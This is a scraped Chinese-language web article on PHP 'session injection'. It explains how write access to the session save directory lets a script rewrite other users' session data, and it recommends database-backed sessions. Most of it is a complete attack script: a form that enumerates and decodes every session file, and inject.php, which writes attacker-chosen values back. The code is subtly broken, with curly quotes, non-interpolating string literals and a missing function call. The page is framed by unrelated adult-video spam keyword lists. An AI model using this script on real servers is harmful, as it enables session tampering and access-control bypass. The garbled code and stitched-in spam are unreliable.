av一区二区在线观看_亚洲男人的天堂网站_日韩亚洲视频_在线成人免费_欧美日韩精品免费观看视频_久草视

您的位置:首頁技術文章
文章詳情頁

PHP安全-會話注入

瀏覽:107日期:2022-09-11 18:05:06
會話注入

一個與會話暴露類似的問題是會話注入。此類攻擊是基于你的WEB服務器除了對會話存儲目錄有讀取權限外,還有寫入權限。因此,存在著編寫一段允許其他用戶添加,編輯或刪除會話的腳本的可能。下例顯示了一個允許用戶方便地編輯已存在的會話數據的HTML表單:

<?php

session_start();

?>

<form action='inject.php' method='POST'>

<?php

$path = ini_get(’session.save_path’);

$handle = dir($path);

while ($filename = $handle->read())

{

if (substr($filename, 0, 5) == ’sess_’)

{

$sess_data = file_get_contents('$path/$filename');

if (!empty($sess_data))

{

session_decode($sess_data);

$sess_data = $_SESSION;

$_SESSION = array();

$sess_name = substr($filename, 5);

$sess_name = htmlentities($sess_name, ENT_QUOTES, ’UTF-8’);

echo '<h1>Session [$sess_name]</h1>';

foreach ($sess_data as $name => $value)

{

$name = htmlentities($name, ENT_QUOTES, ’UTF-8’);

$value = htmlentities($value, ENT_QUOTES, ’UTF-8’);

echo '<p>

$name:

<input type='text'

name='{$sess_name}[{$name}]'

value='$value' />

</p>';

}

echo ’<br />’;

}

}

}

$handle->close();

?>

<input type='submit' />

</form>

腳本inject.php執行由表單所指定的修改:

<?php

session_start();

$path = ini_get(’session.save_path’);

foreach ($_POST as $sess_name => $sess_data)

{

$_SESSION = $sess_data;

$sess_data = session_encode;

file_put_contents('$path/$sess_name', $sess_data);

}

$_SESSION = array();

?>

此類攻擊非常危險。攻擊者不僅可以編輯你的用戶的數據,還可以編輯他自己的會話數據。它比會話劫持更為強大,因為攻擊者能選擇所有的會話數據進行修改,從而使繞過訪問限制和其他安全手段成為可能。

針對這個問題的最好解決方案是將會話數據保存在數據庫中。參見前節所示。

標簽: PHP
相關文章:
主站蜘蛛池模板: 亚洲精品一区在线 | 亚洲精品日韩综合观看成人91 | 99re6在线视频精品免费 | 婷婷久久综合 | 秋霞电影院午夜伦 | 成人午夜精品 | 毛片com| www在线视频| 日本电影韩国电影免费观看 | 欧美精品在线看 | 一区精品视频在线观看 | 久久久www成人免费精品 | 中国免费黄色片 | 亚洲夜射 | 久久伦理中文字幕 | 欧美日韩不卡合集视频 | 欧美黑人一级爽快片淫片高清 | 天天噜天天干 | 久久国产美女视频 | 中文福利视频 | 成人精品鲁一区一区二区 | 亚洲手机视频在线 | 人碰人操 | 国产日韩一区二区 | 日韩欧美大片在线观看 | 男女免费视频网站 | 五月花丁香婷婷 | 国产毛片久久久久久久久春天 | 国产欧美一区二区三区免费 | 成人av播放| 国产九九九| 国内久久 | 成人午夜精品 | 亚洲精品丝袜日韩 | 国产福利在线播放麻豆 | 欧美日韩淫片 | 美女久久 | 天天天操天天天干 | 欧美激情99| 欧美日韩一区精品 | 二区在线视频 |